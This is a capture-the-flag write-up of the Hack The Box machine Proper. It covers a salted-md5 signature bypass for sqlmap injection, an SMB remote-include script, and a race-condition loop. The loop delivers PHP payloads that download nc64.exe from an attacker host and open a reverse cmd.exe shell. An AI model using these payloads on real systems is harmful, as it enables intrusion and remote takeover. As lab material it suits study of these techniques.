HTB – Proper

The `h` parameter is an md5 of a fixed salt (hie0shah6ooNoim) prepended to the `order` value, so sqlmap has to recompute it for every injected payload. `--eval` does exactly that, and we can dump with:

┌──(kali㉿kali)-[~/htb/proper]
└─$ sqlmap -u "http://proper.htb/products-ajax.php?order=id+desc&h=a1b30d31d344a5a4e41e8496ccbdd26b" --eval="import hashlib ; h=hashlib.md5(('hie0shah6ooNoim'+order).encode('utf-8')).hexdigest()" --batch --threads=10 --dump

Then a dirb scan of the web root:

┌──(kali㉿kali)-[~/…/output/proper.htb/dump/cleaner]
└─$ dirb http://proper.htb/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Fri May 21 02:21:54 2021
URL_BASE: http://proper.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://proper.htb/ ----
==> DIRECTORY: http://proper.htb/assets/
+ http://proper.htb/index.html (CODE:200|SIZE:14257)
==> DIRECTORY: http://proper.htb/licenses/

---- Entering directory: http://proper.htb/assets/ ----
==> DIRECTORY: http://proper.htb/assets/api/

We can then log in at http://proper.htb/licenses/licenses.php and view licenses, nothing more.

The `theme` parameter of licenses.php is signed with the same salted-md5 scheme as `order`, so the script below logs in and then requests licenses.php with an arbitrary `theme` value and its matching `h`:

┌──(kali㉿kali)-[~/htb/proper]
└─$ cat read2.sh
#!/bin/bash
# Log in to /licenses/ and request licenses.php with a signed theme= value.
# $1 is the theme value (e.g. a UNC path to the attacker's SMB share).
HOST=10.10.10.231
SALT=hie0shah6ooNoim
TRAV=$1
USER=vikki.solomon@throwaway.mail
PASS=password1

COOKIE=$(mktemp)
PROXY=127.0.0.1:8080
# login: fetch the form to get a session cookie, then post the credentials
curl -c "$COOKIE" -s -o /dev/null http://$HOST/licenses/index.php
curl -s \
    -b "$COOKIE" -c "$COOKIE" \
    -o /dev/null \
    -d "username=${USER}&password=${PASS}" \
    http://$HOST/licenses/index.php
# SMB RFI: theme= plus the matching h=md5(SALT+theme), sent through Burp (-x)
curl -s \
    -b "$COOKIE" \
    -G \
    -d "theme=${TRAV}" \
    -d "h=$(echo -n "${SALT}${TRAV}" | md5sum | cut -d' ' -f1)" \
    -o /dev/null \
    -x $PROXY \
    http://$HOST/licenses/licenses.php
# clean up
rm -f "$COOKIE"
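Both the sqlmap `--eval` above and the `md5sum` line in read2.sh compute the same thing: `h` is the md5 of the salt concatenated with the parameter value, so anyone holding the salt can re-sign any value, and any value sent without re-signing is rejected. The following standalone Python is an added example, not code from the original write-up; the salt, hosts and parameter names are taken from the commands above, the function names (`sign`, `verify`, `signed_url`, `demo`) are my own.

```python
"""Added example: recompute and check the salted-md5 `h` parameter used by
proper.htb. Salt and endpoints come from the write-up's commands; the
functions here are illustrative and not part of the original page."""
import hashlib
import hmac
from urllib.parse import urlencode

SALT = "hie0shah6ooNoim"  # salt used in the sqlmap --eval and in read2.sh


def sign(value: str, salt: str = SALT) -> str:
    """md5(salt + value) as hex: the same thing as
    `echo -n ${SALT}${TRAV} | md5sum` and the sqlmap --eval expression."""
    return hashlib.md5((salt + value).encode("utf-8")).hexdigest()


def verify(value: str, h: str, salt: str = SALT) -> bool:
    """Server-side view of the check: the supplied h must match the
    recomputed signature. Constant-time compare, as a server should do."""
    return hmac.compare_digest(sign(value, salt), h)


def signed_url(base: str, param: str, value: str, **extra: str) -> str:
    """Build a request URL carrying `param` and its matching `h`, e.g.
    products-ajax.php?order=id+desc&h=<md5>. `extra` adds other parameters."""
    query = {param: value, **extra, "h": sign(value)}
    return f"{base}?{urlencode(query)}"


def demo() -> dict:
    """Show why sqlmap needs --eval: a tampered value fails the check until
    it is re-signed with the salt. Values below are constructed for the demo."""
    order = "id desc"
    h = sign(order)
    tampered = "id desc,(select 1)"        # a modified value, h left unchanged
    unc_theme = r"\\10.10.14.23\evil"      # theme= pointing at an SMB share
    return {
        "order_url": signed_url("http://proper.htb/products-ajax.php", "order", order),
        "theme_url": signed_url("http://10.10.10.231/licenses/licenses.php", "theme", unc_theme),
        "original_valid": verify(order, h),                      # True
        "tampered_valid": verify(tampered, h),                   # False
        "tampered_resigned_valid": verify(tampered, sign(tampered)),  # True with the salt
    }


if __name__ == "__main__":
    for key, val in demo().items():
        print(f"{key}: {val}")
```

The `tampered_valid`/`tampered_resigned_valid` pair is the whole point: the check only stops attackers who do not know the salt. Once it leaks, the signature adds nothing, which is why the write-up simply folds it into sqlmap and curl.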


race.sh keeps overwriting header.inc on the share, alternating a harmless string with the PHP payload passed as its first argument, so the file's contents keep changing between the moment the server inspects it and the moment it includes it:

┌──(kali㉿kali)-[~/htb/proper]
└─$ cat race.sh
#!/bin/bash
# Rewrite header.inc in a tight loop: benign content, then the payload.
# $1 is the PHP payload to be included by licenses.php.
PAYLOAD=$1
while :; do
    echo hello world > header.inc
    echo "$PAYLOAD" > header.inc
done

Serve the current directory as an SMB share named `evil` from the attacker box with impacket's smbserver.py; the second form adds credentials for the share:

sudo python3 smbserver.py -ip 10.10.14.23 -smb2support evil .

sudo python3 smbserver.py -username web -password 'charlotte123!' -ip 10.10.14.23 -smb2support evil .

First stage the payload: have the target fetch nc64.exe from the attacker's HTTP server into a writable directory:

./race.sh '<?php system("cmd /c powershell iwr http://10.10.14.73/nc64.exe -outf \windows\system32\spool\drivers\color\cute.exe"); ?>'

Then run it to get a reverse shell back to port 1234 on the attacker host:

./race.sh '<?php system("cmd /c start \windows\system32\spool\drivers\color\cute.exe 10.10.14.73 1234 -e cmd.exe"); ?>'
